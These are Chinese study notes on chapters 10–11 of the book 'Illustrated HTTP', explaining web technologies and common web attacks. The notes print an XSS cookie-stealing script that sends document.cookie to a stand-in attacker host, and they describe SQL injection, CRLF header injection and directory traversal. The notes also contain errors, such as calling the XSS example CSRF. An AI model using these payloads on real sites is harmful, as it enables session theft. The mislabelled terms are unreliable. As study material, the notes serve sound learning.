《图解Http》 10,11章:构建Web的技术, Web的攻击技术

2023-05-28,,

10.2动态HTML

通过调用客户端脚本语言js,实现对web页面的动态改造。利用DOM文档对象模型,指定想发生变化的元素。

10.22 更容易控制的DOM

使用DOM可以将HTML内的元素当作对象操作。

10.3 Web应用

10.31通过Web提供功能的Web应用。

10.32 与web服务器协作的CGI

Common Gateway Interface 通用网关接口:指服务器收到客户端发过来的请求后,转发给程序的一组机制。

10.4 数据发布的格式,语言

10.41 XML (extensible Markup Language)可扩展标记语言

对数据的记录方式做了特别的处理,更适合记录数据结构。

从XML文档中读取数据比HTML更简单。

由于XML的结构基本上是用标签分割的树形结构,因此通过语法分析器的解析功能解析XML结构并取出数据元素,可更容易地对数据进行读取。

10.43 JavaScript 衍生的轻量级JSON

JavaScript Object Notation。

以JS的对象表示法为基础的轻量级数据标记语言。



11 攻击技术

11.12 在客户端即可篡改请求

在请求报文内加载攻击代码:

通过URL查询字段或表单, HTTP header, Cookie等途径把攻击代码传入,如果存在安全漏洞,内部信息就会遭到窃取,或被攻击者拿到管理权。

11.13 对Web应用的攻击模式

主动攻击: 针对服务器上的资源进行攻击。SQL注入攻击, OS命令注入攻击。
被动攻击:利用圈套周恩来执行攻击代码。 Xss跨站脚本攻击。跨站请求伪造。

    诱使用户触发设置好的陷阱,陷阱会启动发送已经嵌入的攻击代码的HTTP请求。
    中招后,浏览器或邮件客户端会触发这个陷阱。
    中招的浏览器把带攻击代码的请求发送给作为攻击目标的web应用,并运行攻击代码。
    执行完攻击代码后,存在安全漏洞的web应用会成为攻击者的跳板,导致用户的Cookie等信息被窃取,登陆状态中的用户权限遭到恶意滥用等。

11.2 因输出值转意不完全引发的安全漏洞

客户端的验证:

主要采取javascript进行简单的验证,辅助性验证,用于提高用户交互行为的体验。因为js可以被用户关闭,所以不能起到安全防护作用。

web服务器端的验证:

输入值验证: 可能会输入攻击代码,因此需要检查是否符合业务逻辑(字符编码,数值)
输出值转意:对输出值进行转意处理是重要的安全策略。

11.21 跨站脚本攻击

攻击者利用预先设置的陷阱触发被动攻击,具体可见之前的博客(全栈案例)

通过加上<script>执行javascript动作,或者塞入其他标签。

例子:对Cookie的偷取:

<script src='http://hackr.jp/xss.js'></script>

这行代码的作用:把js文件内的代码加载到使用的页面中。src属性指定了一个额外的script文件的URL.

js文件内容:

var content = encodeURI(document.cookie);

document.write("<img src='http://hackr.jp/? '");

document.write(content);

document.write(">");

上面第一行得到cookie信息,然后后3行组成一个<img src='xxx'>,

黑客可以通过添加评论的方法把这段脚本传到当前网页上,因为并没有真实的图片,所以出现一个破碎的图片图标。

当用户访问这个带漏洞的网页时,会执行脚本,<img>标签的src是一个带当前Cookie信息的请求,会转到攻击者的网站。攻击者网站的日志会记录下这个Cookie。

总结:

这是一个跨站伪造请求攻击Cross-site request forgery,xss的变种。

CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。


11.22 SQL Injection攻击

Web应用通常会用到数据库,比如对数据进行检索操作。

精通sql语法的黑客利用这点,在检索框内增加导致删除或某些目的性的sql半截语句,点击确认按钮后,

会和内置的SQL语法组合起来形成破坏性的SQL语法。

注意: 一般会利用 -- 标记,这代表后面的代码全部为注释。

在Rails中,使用where子句,可以用特殊的写法避免。

例子:  BookTbI.where("author = ?",  "xxx"), 这样数据库会知道, 上野宣' -- 中的'分号只是普通的代码,并不起到分号本身的作用。


11.23 OS命令注入攻击

通过web应用,执行非法的操作系统命令达到攻击目的。

在可以调用Shell函数的地方就有风险。

11.24 HTTP 首部注入攻击 HTTP Header Injection

通过在响应的首部字段内插入换行,添加任意响应首部或主体的一种攻击。(被动攻击)

设置任何Cookie信息
重定向到任何URL
显示任意的主体:  HTTP 响应截断攻击 HTTP Response Splitting Attack

例子:首部注入攻击

%0D%0A 这个是换行符号。

所以强制增加Set-Cookie首部。

设置了Cookie后,攻击者可以伪装用户。

这是首部注入攻击,插入任意的首部字段。

HTTP响应截断攻击

首部注入攻击的一种,攻击顺序一样,但是要将两个 %0D%0A%%0D%0A 插入字符串后发送。

利用两个连续的换行作出HTTP首部和主体分隔所需要的空行,这样就能伪造主体,达到攻击目的。

⚠️, <! -- 这个是注释。


11.25邮件首部注入攻击

11.26 Directory Traversal 目录遍历攻击

通过非法截断其目录路径后,达成访问的一种攻击。

使用.../ 等相对路径定位到/etc/passed/等绝对路径上,导致服务器上的文件被访问到。

然后黑客就随便浏览,篡改,删除服务器上的内容拉,啊哈哈哈。

应该关闭指定对任意文件名的访问权限。



11.4 Session 的安全漏洞

11.41 Session hijack 会话劫持

通过非正规的生成方法推测会话

图解Http》 10,11章:构建Web的技术, Web的攻击技术的相关教程结束。

《《图解Http》 10,11章:构建Web的技术, Web的攻击技术.doc》

下载本文的Word格式文档,以方便收藏与打印。